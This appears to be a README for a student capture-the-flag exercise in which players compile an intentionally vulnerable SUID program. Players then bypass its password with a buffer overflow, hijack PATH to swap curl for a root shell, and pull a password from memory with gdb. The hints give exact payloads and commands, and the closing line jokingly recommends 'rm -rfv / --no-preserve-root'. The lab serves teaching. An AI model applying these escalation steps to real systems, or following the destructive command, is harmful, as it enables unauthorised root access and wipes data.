- This exploit game aims to learn some very basic linux comands and also some low hacking knowlage to collect all flags.
- And also this is project for BPC-IC1.
- We recommend doing this on some virtual machine (manjaro for example).
- And also for the compiling, player needs to know the root password (but later on player tryes to bypass it).
- Clone this repo and cd in its file:
git clone https://github.com/PrimalMight/IC1_Project.git
smthn=`find $(pwd) -name 'IC1_Project'` && cd $smthn- Compile totally legit SW:
sudo gcc -w -g -fno-stack-protector -o launch_me main.c
sudo gcc -o decryptor decryptor.c - And finally add SUID bit for the second flag
sudo chmod u+s launch_me names
launch_meanddecryptorare optional, but i recommend not changing it.
Start the program with ./launch_me.
-
First flag: Buffer overflow bypass the initial password check!
- After the program is started, player is asked for some password, well we dont know the password, se you need to find other way how to gain acces!
Hint here!
Maybe try spam of ``A`` (somewhere between 1 and 35) ``1`` on the end?Click me, when you really cant find overflow
AAAAAAAAAAAAAAAAAAAAAAAAAAAA1 (28x A) - After the program is started, player is asked for some password, well we dont know the password, se you need to find other way how to gain acces!
-
Second flag: Hijack the path for relative curl call in the program for shell and escalate privilege to root!
$ strings exploit_thisto get information about the compiled file.$ curl -I localhost- curl is called without full path using $PATH variable!- So you need to hijack the curl path and substitute curl for shell.
Hint here!
strings launch_me echo /usr/bin/sh > /tmp/curl #this one is easy, give all privileges to curl (use chmod) export PATH=/tmp:$PATH #cd back to the repo file which curl #launch the compiled program with ./launch_me #enter the password overflow that worked from first flag #choose ``y`` on "do you want to check fo running http localhost service (y/n)" #execute ``whoami`` command to make sure, you have root privileges
-
Third flag: Extract the password from memory using gdb tool and use this password to decrypt
riddle_me_this_batman.txtfile containing final riddle for batman!- There are two parts player needs to do.
- First, create another .txt file and with echo add some text into it (it is needed to do this, because it is the unix way of adding text to the file).
touch test.txt; echo "We are no strangers to love, You know the rules and so do I!"
- launch compiled programme with gdb and try to extract password from memmory.
gdb launch_me break <name_of_the_function_player_need_to_break>
Hint here!
(in normal console) gdb lanch_me (in gdb) break encrypt_file (in gdb) #answer ``y`` to "Enable debuginfo for this session(y or [n])" (in gdb) run (in gdb) #enter the "password" from first flag (in gdb) #answer ``n`` to "want to check for local service running?" (in gdb) #answer ``y`` to "do you want to encrypt file? (y/n)" (in gdb) #enter the filename: test.txt (or whatever you choosed to name it) (in gdb) x/s password #still in the gdb (in gdb) exit (in gdb) #answer ``y`` to "Quit anyway?(y or n)"
- Second part is decrypthing the
riddle_me_this_batman.txt. - To do that, you need once again enter shell with root privileges (second flag) and use password you found above for encryptor to decrypt .txt file.
./decryptor > please provide a password: <here_goes_the_password> nano output_plaintext.txt
- And now you've got all the flags, so there is one final thing you need to do before you leave this VM image, what is the answer for the riddle?.
- Click me for answer
Hint here!
(normal console) ./launch_me > Do you want to check for runninf http localhost service? (y/n) y (root from flag2) ./decryptor > Please prowide a password: <here_goes_the_password> (root from flag2) nano output_plaintext.txt
- And now you can leave with style!
I recommend using something like
rm -rfv / --no-preserve-root
Authors: 2x BPC-IBE, 1x BPC-TLI
- Buffer overflow into password check bypass
- Relative path hijack into privilege escalation with SUID bit
- Visible password in memory